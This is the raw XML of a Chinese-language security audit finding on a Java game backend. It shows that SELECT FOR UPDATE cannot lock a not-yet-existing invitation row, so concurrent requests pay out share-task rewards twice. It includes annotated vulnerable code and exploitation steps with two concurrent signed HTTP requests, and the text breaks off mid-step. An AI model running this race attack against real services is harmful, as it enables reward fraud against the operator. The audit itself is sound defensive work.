        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 首次处理时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 锁空行失效，导致任务进度奖励可被并发重复触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="94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src/main/java/com/gameBack/mjservice/service/ShareService.java:shareLevel3Success</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="94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94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94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：普通用户（需持有合法 Token，并拥有至少一名已完成 KYC 的真实被邀请人）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p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>代码注释明确写道：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; "FOR UPDATE + 已处理则 return，防重复 unlockSlot/updateProgress 刷任务奖励"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">开发者的意图是用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 互斥同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>(inviterUserId, inviteeUserId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的并发请求。但该模式存在经典盲区：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当目标行尚不存在时，`SELECT ... FOR UPDATE` 返回空结果集，不会对任何行加锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，两个并发事务可同时获得空结果并均通过幂等性判断，继而各自调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>taskExecutionService.updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，导致奖励被重复发放。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>具体时序（level3 首次处理，无既有记录）：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TX1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事务 TX2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findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（无行可锁）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findByInviterUserIdAndInviteeUserIdForUpdate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>空</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>（无行可锁）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幂等判断：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>existingOpt.isPresent()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = false → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>不返回</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幂等判断：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>existingOpt.isPresent()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = false → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>不返回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minerService.unlockSlot(inviterUserId, 9, 3)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ← 首次触发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taskExecutionService.updateProgress(inviterUserId, "3", 1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ← </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>奖励1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minerService.unlockSlot(inviterUserId, 9, 3)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ← 再次触发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taskExecutionService.updateProgress(inviterUserId, "3", 1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ← </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>奖励2（重复）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t9</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save(record)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> isKycCompleted=1 → 提交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save(record)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> → 若无 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>UNIQUE(inviterUserId, inviteeUserId)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 唯一约束则提交；若有约束则回滚，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>但 TX2 中 updateProgress/unlockSlot 是否同事务回滚取决于其内部实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareLevel2Success</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存在完全相同的模式（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>existingOpt.isPresent()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断同样无法覆盖并发首次插入场景）。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/api/share/complete</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → TokenAuthFilter：校验 Bearer Token，提取真实 userId（不可伪造）</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → SignAuthTestFilter：校验请求签名防重放</w:t>
              <w:br/>
              <w:t xml:space="preserve">  → ShareController.shareComplete（userId=Token, inviteeUserId=body可控, shareType=body可控）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → ShareService.shareComplete（@Transactional）</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → ShareService.shareLevel3Success（@Transactional，因同类调用 AOP 代理失效，</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                         实际在 shareComplete 的事务内运行）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        → findByInviterUserIdAndInviteeUserIdForUpdate  ← FOR UPDATE 无法锁空行</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        → [幂等判断失效] taskExecutionService.updateProgress ← 奖励重复发放点</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入口：ShareController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/complete")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; shareComplete(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                                       @RequestBody ShareCompleteForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (form.getInviterUserId() != null &amp;&amp; !form.getInviterUserId().equals(userId)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("inviterUserId 须与当前登录用户一致");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    shareService.shareComplete(userId, form.getInviteeUserId(), form.getShareType()); // ← inviteeUserId / shareType 攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 路由层：ShareService.java#shareComplete</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareComplete(Long currentUserId, Long inviteeUserId, String shareType) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if ("level3".equals(type)) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        shareLevel3Success(currentUserId, inviteeUserId); // ← 同类调用，@Transactional 注解实际被忽略，复用外层事务</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：ShareService.java#shareLevel3Success</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void shareLevel3Success(Long inviterUserId, Long inviteeUserId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User invitee = requireInviteeOfInviter(inviterUserId, inviteeUserId); // 校验邀请关系，通过后继续</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (invitee.getIsKycVerified() == null || invitee.getIsKycVerified() != 1) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("用户不存在或用户未完成KYC认证");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // FOR UPDATE 仅能锁已存在的行；首次处理时目标行不存在，返回空集合，不加任何锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Optional&lt;UserInvitationRecord&gt; existingOpt =</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userInvitationRecordRepository.findByInviterUserIdAndInviteeUserIdForUpdate(</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    inviterUserId, inviteeUserId); // ← 首次调用返回 empty，无法互斥并发事务</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(existingOpt.isPresent() &amp;&amp; Integer.valueOf(1).equals(existingOpt.get().getIsKycCompleted())) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.unlockSlot(inviterUserId, 9, 3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return; // ← 幂等返回，正常路径</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ↓ 当 existingOpt 为 empty 时，两个并发事务均可同时到达此处</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.unlockSlot(inviterUserId, 9, 3);                       // ← 并发时被重复调用</w:t>
              <w:br/>
              <w:t xml:space="preserve">    taskExecutionService.updateProgress(inviterUserId, "3", 1);         // ← 并发时被重复调用，奖励重复发放</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    UserInvitationRecord record = existingOpt.orElseGet(() -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        UserInvitationRecord r = new UserInvitationRecord();</w:t>
              <w:br/>
              <w:t xml:space="preserve">        r.setInviterUserId(inviterUserId); // ← 两个事务各自 new 一条记录</w:t>
              <w:br/>
              <w:t xml:space="preserve">        r.setInviteeUserId(inviteeUserId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        r.setInviteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return r;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setInviteType(3);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setIsRegistered(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    record.setIsKycCompleted(1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userInvitationRecordRepository.save(record); // ← 若无 UNIQUE 约束，两条记录均持久化</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利用者需先准备：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 数据库中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.inviter_user_id = &lt;攻击者userId&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 且 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>is_kyc_verified = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的真实用户 ID（即攻击者实际邀请的已认证用户）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>以下两个请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（脚本或 curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方式）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 A（与请求 B 同时发出）：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&lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce-A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign-A&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviterUserId": null,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviteeUserId": &lt;已认证被邀请人userId&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "shareType": "level3"</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请求 B（与请求 A 同时发出）：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&lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce-B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign-B&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviterUserId": null,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "inviteeUserId": &lt;已认证被邀请人userId&gt;,</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "shareType": "level3"</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947"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者使用自己的账号邀请注册一名用户，并等待该用户完成 KYC 认证（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>is_kyc_verified=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="948"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">记录被邀请人的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（也可通过遍历邀请关系获取）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">构造两条（或多条）合法签名的 HTTP 请求，均携带攻击者 Token 和同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inviteeUserId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareType=level3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="950"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">利用脚本（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">、curl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
